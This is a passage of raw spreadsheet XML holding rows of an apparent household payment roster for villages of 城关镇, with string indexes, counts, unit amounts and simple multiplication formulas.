        <v>1083</v>
      </c>
      <c r="B359" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C359" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D359" s="14" t="s">
        <v>1084</v>
      </c>
      <c r="E359" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F359" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G359" s="14">
        <v>1</v>
      </c>
      <c r="H359" s="14">
        <v>340</v>
      </c>
      <c r="I359" s="14">
        <f t="shared" si="13"/>
        <v>340</v>
      </c>
      <c r="J359" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K359" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="360" ht="23" customHeight="1" spans="1:11">
      <c r="A360" s="13" t="s">
        <v>1085</v>
      </c>
      <c r="B360" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C360" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D360" s="14" t="s">
        <v>1086</v>
      </c>
      <c r="E360" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F360" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G360" s="14">
        <v>2</v>
      </c>
      <c r="H360" s="14">
        <v>300</v>
      </c>
      <c r="I360" s="14">
        <f t="shared" si="13"/>
        <v>600</v>
      </c>
      <c r="J360" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K360" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="361" ht="23" customHeight="1" spans="1:11">
      <c r="A361" s="13" t="s">
        <v>1087</v>
      </c>
      <c r="B361" s="14" t="str">
        <f>B360</f>
        <v>城关镇</v>
      </c>
      <c r="C361" s="14" t="str">
        <f>C360</f>
        <v>中华村</v>
      </c>
      <c r="D361" s="13" t="s">
        <v>1088</v>
      </c>
      <c r="E361" s="13" t="s">
        <v>320</v>
      </c>
      <c r="F361" s="14" t="str">
        <f>F360</f>
        <v>4113210108</v>
      </c>
      <c r="G361" s="14"/>
      <c r="H361" s="14"/>
      <c r="I361" s="14"/>
      <c r="J361" s="14"/>
      <c r="K361" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="362" ht="23" customHeight="1" spans="1:11">
      <c r="A362" s="13" t="s">
        <v>1089</v>
      </c>
      <c r="B362" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C362" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D362" s="14" t="s">
        <v>1090</v>
      </c>
      <c r="E362" s="14" t="s">
        <v>405</v>
      </c>
      <c r="F362" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G362" s="14">
        <v>1</v>
      </c>
      <c r="H362" s="14">
        <v>340</v>
      </c>
      <c r="I362" s="14">
        <f>H362*G362</f>
        <v>340</v>
      </c>
      <c r="J362" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K362" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="363" ht="23" customHeight="1" spans="1:11">
      <c r="A363" s="13" t="s">
        <v>1091</v>
      </c>
      <c r="B363" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C363" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D363" s="14" t="s">
        <v>1092</v>
      </c>
      <c r="E363" s="14" t="s">
        <v>1093</v>
      </c>
      <c r="F363" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G363" s="14">
        <v>1</v>
      </c>
      <c r="H363" s="14">
        <v>340</v>
      </c>
      <c r="I363" s="14">
        <f>H363*G363</f>
        <v>340</v>
      </c>
      <c r="J363" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K363" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="364" ht="23" customHeight="1" spans="1:11">
      <c r="A364" s="13" t="s">
        <v>1094</v>
      </c>
      <c r="B364" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C364" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D364" s="14" t="s">
        <v>1095</v>
      </c>
      <c r="E364" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F364" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G364" s="14">
        <v>3</v>
      </c>
      <c r="H364" s="14">
        <v>290</v>
      </c>
      <c r="I364" s="14">
        <f>H364*G364</f>
        <v>870</v>
      </c>
      <c r="J364" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K364" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="365" ht="23" customHeight="1" spans="1:11">
      <c r="A365" s="13" t="s">
        <v>1096</v>
      </c>
      <c r="B365" s="14" t="str">
        <f>B364</f>
        <v>城关镇</v>
      </c>
      <c r="C365" s="14" t="str">
        <f>C364</f>
        <v>北外村</v>
      </c>
      <c r="D365" s="13" t="s">
        <v>1097</v>
      </c>
      <c r="E365" s="13" t="s">
        <v>273</v>
      </c>
      <c r="F365" s="14" t="str">
        <f>F364</f>
        <v>4113210102</v>
      </c>
      <c r="G365" s="14"/>
      <c r="H365" s="14"/>
      <c r="I365" s="14"/>
      <c r="J365" s="14"/>
      <c r="K365" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="366" ht="23" customHeight="1" spans="1:11">
      <c r="A366" s="13" t="s">
        <v>1098</v>
      </c>
      <c r="B366" s="14" t="str">
        <f>B365</f>
        <v>城关镇</v>
      </c>
      <c r="C366" s="14" t="str">
        <f>C365</f>
        <v>北外村</v>
      </c>
      <c r="D366" s="18" t="s">
        <v>1099</v>
      </c>
      <c r="E366" s="18" t="s">
        <v>1100</v>
      </c>
      <c r="F366" s="14" t="str">
        <f>F365</f>
        <v>4113210102</v>
      </c>
      <c r="G366" s="14"/>
      <c r="H366" s="14"/>
      <c r="I366" s="14"/>
      <c r="J366" s="14"/>
      <c r="K366" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="367" ht="23" customHeight="1" spans="1:11">
      <c r="A367" s="13" t="s">
        <v>1101</v>
      </c>
      <c r="B367" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C367" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D367" s="14" t="s">
        <v>1102</v>
      </c>
      <c r="E367" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F367" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G367" s="14">
        <v>1</v>
      </c>
      <c r="H367" s="14">
        <v>340</v>
      </c>
      <c r="I367" s="14">
        <f>H367*G367</f>
        <v>340</v>
      </c>
      <c r="J367" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K367" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="368" ht="23" customHeight="1" spans="1:11">
      <c r="A368" s="13" t="s">
        <v>1103</v>
      </c>
      <c r="B368" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C368" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D368" s="14" t="s">
        <v>1104</v>
      </c>
      <c r="E368" s="14" t="s">
        <v>916</v>
      </c>
      <c r="F368" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G368" s="14">
        <v>2</v>
      </c>
      <c r="H368" s="14">
        <v>300</v>
      </c>
      <c r="I368" s="14">
        <f>H368*G368</f>
        <v>600</v>
      </c>
      <c r="J368" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K368" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="369" ht="23" customHeight="1" spans="1:11">
      <c r="A369" s="13" t="s">
        <v>1105</v>
      </c>
      <c r="B369" s="14" t="str">
        <f>B368</f>
        <v>城关镇</v>
      </c>
      <c r="C369" s="14" t="str">
        <f>C368</f>
        <v>西北村</v>
      </c>
      <c r="D369" s="13" t="s">
        <v>1106</v>
      </c>
      <c r="E369" s="13" t="s">
        <v>1107</v>
      </c>
      <c r="F369" s="14" t="str">
        <f>F368</f>
        <v>4113210106</v>
      </c>
      <c r="G369" s="14"/>
      <c r="H369" s="14"/>
      <c r="I369" s="14"/>
      <c r="J369" s="14"/>
      <c r="K369" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="370" ht="23" customHeight="1" spans="1:11">
      <c r="A370" s="13" t="s">
        <v>1108</v>
      </c>
      <c r="B370" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C370" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D370" s="14" t="s">
        <v>1109</v>
      </c>
      <c r="E370" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F370" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G370" s="14">
        <v>1</v>
      </c>
      <c r="H370" s="14">
        <v>340</v>
      </c>
      <c r="I370" s="14">
        <f>H370*G370</f>
        <v>340</v>
      </c>
      <c r="J370" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K370" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="371" ht="23" customHeight="1" spans="1:11">
      <c r="A371" s="13" t="s">
        <v>1110</v>
      </c>
      <c r="B371" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C371" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D371" s="14" t="s">
        <v>1111</v>
      </c>
      <c r="E371" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F371" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G371" s="14">
        <v>1</v>
      </c>
      <c r="H371" s="14">
        <v>340</v>
      </c>
      <c r="I371" s="14">
        <f>H371*G371</f>
        <v>340</v>
      </c>
      <c r="J371" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K371" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="372" ht="23" customHeight="1" spans="1:11">
      <c r="A372" s="13" t="s">
        <v>1112</v>
      </c>
      <c r="B372" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C372" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D372" s="14" t="s">
        <v>1113</v>
      </c>
      <c r="E372" s="14" t="s">
        <v>1114</v>
      </c>
      <c r="F372" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G372" s="14">
        <v>2</v>
      </c>
      <c r="H372" s="14">
        <v>300</v>
      </c>
      <c r="I372" s="14">
        <f>H372*G372</f>
        <v>600</v>
      </c>
      <c r="J372" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K372" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="373" ht="23" customHeight="1" spans="1:11">
      <c r="A373" s="13" t="s">
        <v>1115</v>
      </c>
      <c r="B373" s="14" t="str">
        <f>B372</f>
        <v>城关镇</v>
      </c>
      <c r="C373" s="14" t="str">
        <f>C372</f>
        <v>中华村</v>
      </c>
      <c r="D373" s="13" t="s">
        <v>1116</v>
      </c>
      <c r="E373" s="13" t="s">
        <v>1117</v>
      </c>
      <c r="F373" s="14" t="str">
        <f>F372</f>
        <v>4113210108</v>
      </c>
      <c r="G373" s="14"/>
      <c r="H373" s="14"/>
      <c r="I373" s="14"/>
      <c r="J373" s="14"/>
      <c r="K373" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="374" ht="23" customHeight="1" spans="1:11">
      <c r="A374" s="13" t="s">
        <v>1118</v>
      </c>
      <c r="B374" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C374" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D374" s="14" t="s">
        <v>1119</v>
      </c>
      <c r="E374" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F374" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G374" s="14">
        <v>1</v>
      </c>
      <c r="H374" s="14">
        <v>340</v>
      </c>
      <c r="I374" s="14">
        <f>H374*G374</f>
        <v>340</v>
      </c>
      <c r="J374" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K374" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="375" ht="23" customHeight="1" spans="1:11">
      <c r="A375" s="13" t="s">
        <v>1120</v>
      </c>
      <c r="B375" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C375" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D375" s="14" t="s">
        <v>1121</v>
      </c>
      <c r="E375" s="14" t="s">
        <v>276</v>
      </c>
      <c r="F375" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G375" s="14">
        <v>2</v>
      </c>
      <c r="H375" s="14">
        <v>300</v>
      </c>
      <c r="I375" s="14">
        <f>H375*G375</f>
        <v>600</v>
      </c>
      <c r="J375" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K375" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="376" ht="23" customHeight="1" spans="1:11">
      <c r="A376" s="13" t="s">
        <v>1122</v>
      </c>
      <c r="B376" s="14" t="str">
        <f>B375</f>
        <v>城关镇</v>
      </c>
      <c r="C376" s="14" t="str">
        <f>C375</f>
        <v>中华村</v>
      </c>
      <c r="D376" s="13" t="s">
        <v>1123</v>
      </c>
      <c r="E376" s="13" t="s">
        <v>1124</v>
      </c>
      <c r="F376" s="14" t="str">
        <f>F375</f>
        <v>4113210108</v>
      </c>
      <c r="G376" s="14"/>
      <c r="H376" s="14"/>
      <c r="I376" s="14"/>
      <c r="J376" s="14"/>
      <c r="K376" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="377" ht="23" customHeight="1" spans="1:11">
      <c r="A377" s="13" t="s">
        <v>1125</v>
      </c>
      <c r="B377" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C377" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D377" s="14" t="s">
        <v>1126</v>
      </c>
      <c r="E377" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F377" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G377" s="14">
        <v>2</v>
      </c>
      <c r="H377" s="14">
        <v>300</v>
      </c>
      <c r="I377" s="14">
        <f>H377*G377</f>
        <v>600</v>
      </c>
      <c r="J377" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K377" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="378" ht="23" customHeight="1" spans="1:11">
      <c r="A378" s="13" t="s">
        <v>1127</v>
      </c>
      <c r="B378" s="14" t="str">
        <f>B377</f>
        <v>城关镇</v>
      </c>
      <c r="C378" s="14" t="str">
        <f>C377</f>
        <v>北外村</v>
      </c>
      <c r="D378" s="13" t="s">
        <v>1128</v>
      </c>
      <c r="E378" s="13" t="s">
        <v>249</v>
      </c>
      <c r="F378" s="14" t="str">
        <f>F377</f>
        <v>4113210102</v>
      </c>
      <c r="G378" s="14"/>
      <c r="H378" s="14"/>
      <c r="I378" s="14"/>
      <c r="J378" s="14"/>
      <c r="K378" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="379" ht="23" customHeight="1" spans="1:11">
      <c r="A379" s="13" t="s">
        <v>1129</v>
      </c>
      <c r="B379" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C379" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D379" s="14" t="s">
        <v>1130</v>
      </c>
      <c r="E379" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F379" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G379" s="14">
        <v>1</v>
      </c>
      <c r="H379" s="14">
        <v>340</v>
      </c>
      <c r="I379" s="14">
        <f>H379*G379</f>
        <v>340</v>
      </c>
      <c r="J379" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K379" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="380" ht="23" customHeight="1" spans="1:11">
      <c r="A380" s="13" t="s">
        <v>1131</v>
      </c>
      <c r="B380" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C380" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D380" s="14" t="s">
        <v>1132</v>
      </c>
      <c r="E380" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F380" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G380" s="14">
        <v>1</v>
      </c>
      <c r="H380" s="14">
        <v>340</v>
      </c>
      <c r="I380" s="14">
        <f>H380*G380</f>
        <v>340</v>
      </c>
      <c r="J380" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K380" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="381" ht="23" customHeight="1" spans="1:11">
      <c r="A381" s="13" t="s">
        <v>1133</v>
      </c>
      <c r="B381" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C381" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D381" s="14" t="s">
        <v>1134</v>
      </c>
      <c r="E381" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F381" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G381" s="14">
        <v>2</v>
      </c>
      <c r="H381" s="14">
        <v>300</v>
      </c>
      <c r="I381" s="14">
        <f>H381*G381</f>
        <v>600</v>
      </c>
      <c r="J381" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K381" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="382" ht="23" customHeight="1" spans="1:11">
      <c r="A382" s="13" t="s">
        <v>1135</v>
      </c>
      <c r="B382" s="14" t="str">
        <f>B381</f>
        <v>城关镇</v>
      </c>
      <c r="C382" s="14" t="str">
        <f>C381</f>
        <v>西北村</v>
      </c>
      <c r="D382" s="13" t="s">
        <v>1136</v>
      </c>
      <c r="E382" s="13" t="s">
        <v>491</v>
      </c>
      <c r="F382" s="14" t="str">
        <f>F381</f>
        <v>4113210106</v>
      </c>
      <c r="G382" s="14"/>
      <c r="H382" s="14"/>
      <c r="I382" s="14"/>
      <c r="J382" s="14"/>
      <c r="K382" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="383" ht="23" customHeight="1" spans="1:11">
      <c r="A383" s="13" t="s">
        <v>1137</v>
      </c>
      <c r="B383" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C383" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D383" s="14" t="s">
        <v>1138</v>
      </c>
      <c r="E383" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F383" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G383" s="14">
        <v>1</v>
      </c>
      <c r="H383" s="14">
        <v>340</v>
      </c>
      <c r="I383" s="14">
        <f>H383*G383</f>
        <v>340</v>
      </c>
      <c r="J383" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K383" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="384" ht="23" customHeight="1" spans="1:11">
      <c r="A384" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B384" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C384" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D384" s="14" t="s">
        <v>1140</v>
      </c>
      <c r="E384" s="14" t="s">
        <v>1141</v>
      </c>
      <c r="F384" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G384" s="14">
        <v>2</v>
      </c>
      <c r="H384" s="14">
        <v>300</v>
      </c>
      <c r="I384" s="14">
        <f>H384*G384</f>
        <v>600</v>
      </c>
      <c r="J384" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K384" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="385" ht="23" customHeight="1" spans="1:11">
      <c r="A385" s="13" t="s">
        <v>1142</v>
      </c>
      <c r="B385" s="14" t="str">
        <f>B384</f>
        <v>城关镇</v>
      </c>
      <c r="C385" s="14" t="str">
        <f>C384</f>
        <v>东北村</v>
      </c>
      <c r="D385" s="13" t="s">
        <v>1143</v>
      </c>
      <c r="E385" s="13" t="s">
        <v>438</v>
      </c>
      <c r="F385" s="14" t="str">
        <f>F384</f>
        <v>4113210103</v>
      </c>
      <c r="G385" s="14"/>
      <c r="H385" s="14"/>
      <c r="I385" s="14"/>
      <c r="J385" s="14"/>
      <c r="K385" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="386" ht="23" customHeight="1" spans="1:11">
      <c r="A386" s="13" t="s">
        <v>1144</v>
      </c>
      <c r="B386" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C386" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D386" s="14" t="s">
        <v>1145</v>
      </c>
      <c r="E386" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F386" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G386" s="14">
        <v>2</v>
      </c>
      <c r="H386" s="14">
        <v>300</v>
      </c>
      <c r="I386" s="14">
        <f>H386*G386</f>
        <v>600</v>
      </c>
      <c r="J386" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K386" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="387" ht="23" customHeight="1" spans="1:11">
      <c r="A387" s="13" t="s">
        <v>1146</v>
      </c>
      <c r="B387" s="14" t="str">
        <f>B386</f>
        <v>城关镇</v>
      </c>
      <c r="C387" s="14" t="str">
        <f>C386</f>
        <v>北外村</v>
      </c>
      <c r="D387" s="15" t="s">
        <v>1147</v>
      </c>
      <c r="E387" s="15" t="s">
        <v>1148</v>
      </c>
      <c r="F387" s="14" t="str">
        <f>F386</f>
        <v>4113210102</v>
      </c>
      <c r="G387" s="14"/>
      <c r="H387" s="14"/>
      <c r="I387" s="14"/>
      <c r="J387" s="14"/>
      <c r="K387" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="388" ht="23" customHeight="1" spans="1:11">
      <c r="A388" s="13" t="s">
        <v>1149</v>
      </c>
      <c r="B388" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C388" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D388" s="14" t="s">
        <v>1150</v>
      </c>
      <c r="E388" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F388" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G388" s="14">
        <v>1</v>
      </c>
      <c r="H388" s="14">
        <v>340</v>
      </c>
      <c r="I388" s="14">
        <f>H388*G388</f>
        <v>340</v>
      </c>
      <c r="J388" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K388" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="389" ht="23" customHeight="1" spans="1:11">
      <c r="A389" s="13" t="s">
        <v>1151</v>
      </c>
      <c r="B389" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C389" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D389" s="14" t="s">
        <v>1152</v>
      </c>
      <c r="E389" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F389" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G389" s="14">
        <v>1</v>
      </c>
      <c r="H389" s="14">
        <v>340</v>
      </c>
      <c r="I389" s="14">
        <f>H389*G389</f>
        <v>340</v>
      </c>
      <c r="J389" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K389" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="390" ht="23" customHeight="1" spans="1:11">
      <c r="A390" s="13" t="s">
        <v>1153</v>
      </c>
      <c r="B390" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C390" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D390" s="14" t="s">
        <v>1154</v>
      </c>
      <c r="E390" s="14" t="s">
        <v>1155</v>
      </c>
      <c r="F390" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G390" s="14">
        <v>1</v>
      </c>
      <c r="H390" s="14">
        <v>340</v>
      </c>
      <c r="I390" s="14">
        <f>H390*G390</f>
        <v>340</v>
      </c>
      <c r="J390" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K390" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="391" ht="23" customHeight="1" spans="1:11">
      <c r="A391" s="13" t="s">
        <v>1156</v>
      </c>
      <c r="B391" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C391" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D391" s="14" t="s">
        <v>1157</v>
      </c>
      <c r="E391" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F391" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G391" s="14">
        <v>1</v>
      </c>
      <c r="H391" s="14">
        <v>340</v>
      </c>
      <c r="I391" s="14">
        <f>H391*G391</f>
        <v>340</v>
      </c>
      <c r="J391" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K391" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="392" ht="23" customHeight="1" spans="1:11">
      <c r="A392" s="13" t="s">
        <v>1158</v>
      </c>
      <c r="B392" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C392" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D392" s="14" t="s">
        <v>1159</v>
      </c>
      <c r="E392" s="14" t="s">
        <v>1160</v>
      </c>
      <c r="F392" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G392" s="14">
        <v>2</v>
      </c>
      <c r="H392" s="14">
        <v>300</v>
      </c>
      <c r="I392" s="14">
        <f>H392*G392</f>
        <v>600</v>
      </c>
      <c r="J392" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K392" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="393" ht="23" customHeight="1" spans="1:11">
      <c r="A393" s="13" t="s">
        <v>1161</v>
      </c>
      <c r="B393" s="14" t="str">
        <f>B392</f>
        <v>城关镇</v>
      </c>
      <c r="C393" s="14" t="str">
        <f>C392</f>
        <v>北外村</v>
      </c>
      <c r="D393" s="13" t="s">
        <v>1162</v>
      </c>
      <c r="E393" s="13" t="s">
        <v>1163</v>
      </c>
      <c r="F393" s="14" t="str">
        <f>F392</f>
        <v>4113210102</v>
      </c>
      <c r="G393" s="14"/>
      <c r="H393" s="14"/>
      <c r="I393" s="14"/>
      <c r="J393" s="14"/>
      <c r="K393" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="394" ht="23" customHeight="1" spans="1:11">
      <c r="A394" s="13" t="s">
        <v>1164</v>
      </c>
      <c r="B394" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C394" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D394" s="14" t="s">
        <v>1165</v>
      </c>
      <c r="E394" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F394" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G394" s="14">
        <v>1</v>
      </c>
      <c r="H394" s="14">
        <v>340</v>
      </c>
      <c r="I394" s="14">
        <f>H394*G394</f>
        <v>340</v>
      </c>
      <c r="J394" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K394" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="395" ht="23" customHeight="1" spans="1:11">
      <c r="A395" s="13" t="s">
        <v>1166</v>
      </c>
      <c r="B395" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C395" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D395" s="14" t="s">
        <v>1167</v>
      </c>
      <c r="E395" s="14" t="s">
        <v>1168</v>
      </c>
      <c r="F395" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G395" s="14">
        <v>2</v>
      </c>
      <c r="H395" s="14">
        <v>300</v>
      </c>
      <c r="I395" s="14">
        <f>H395*G395</f>
        <v>600</v>
      </c>
      <c r="J395" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K395" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="396" ht="23" customHeight="1" spans="1:11">
      <c r="A396" s="13" t="s">
        <v>1169</v>
      </c>
      <c r="B396" s="14" t="str">
        <f>B395</f>
        <v>城关镇</v>
      </c>
      <c r="C396" s="14" t="str">
        <f>C395</f>
        <v>北外村</v>
      </c>
      <c r="D396" s="13" t="s">
        <v>1170</v>
      </c>
      <c r="E396" s="13" t="s">
        <v>1171</v>
      </c>
      <c r="F396" s="14" t="str">
        <f>F395</f>
        <v>4113210102</v>
      </c>
      <c r="G396" s="14"/>
      <c r="H396" s="14"/>
      <c r="I396" s="14"/>
      <c r="J396" s="14"/>
      <c r="K396" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="397" ht="23" customHeight="1" spans="1:11">
      <c r="A397" s="13" t="s">
        <v>1172</v>
      </c>
      <c r="B397" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C397" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D397" s="14" t="s">
        <v>1173</v>
      </c>
      <c r="E397" s="14" t="s">
        <v>1174</v>
      </c>
      <c r="F397" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G397" s="14">
        <v>2</v>
      </c>
      <c r="H397" s="14">
        <v>300</v>
      </c>
      <c r="I397" s="14">
        <f>H397*G397</f>
        <v>600</v>
      </c>
      <c r="J397" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K397" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="398" ht="23" customHeight="1" spans="1:11">
      <c r="A398" s="13" t="s">
        <v>1175</v>
      </c>
      <c r="B398" s="14" t="str">
        <f>B397</f>
        <v>城关镇</v>
      </c>
      <c r="C398" s="14" t="str">
        <f>C397</f>
        <v>东北村</v>
      </c>
      <c r="D398" s="14" t="s">
        <v>1176</v>
      </c>
      <c r="E398" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F398" s="14" t="str">
        <f>F397</f>
        <v>4113210103</v>
      </c>
      <c r="G398" s="14"/>
      <c r="H398" s="14"/>
      <c r="I398" s="14"/>
      <c r="J398" s="14"/>
      <c r="K398" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="399" ht="23" customHeight="1" spans="1:11">
      <c r="A399" s="13" t="s">
        <v>1177</v>
      </c>
      <c r="B399" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C399" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D399" s="14" t="s">
        <v>1178</v>
      </c>
      <c r="E399" s="14" t="s">
        <v>527</v>
      </c>
      <c r="F399" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G399" s="14">
        <v>2</v>
      </c>
      <c r="H399" s="14">
        <v>320</v>
      </c>
      <c r="I399" s="14">
        <f>H399*G399</f>
        <v>640</v>
      </c>
      <c r="J399" s="14" t="s">
        <v>224</v>
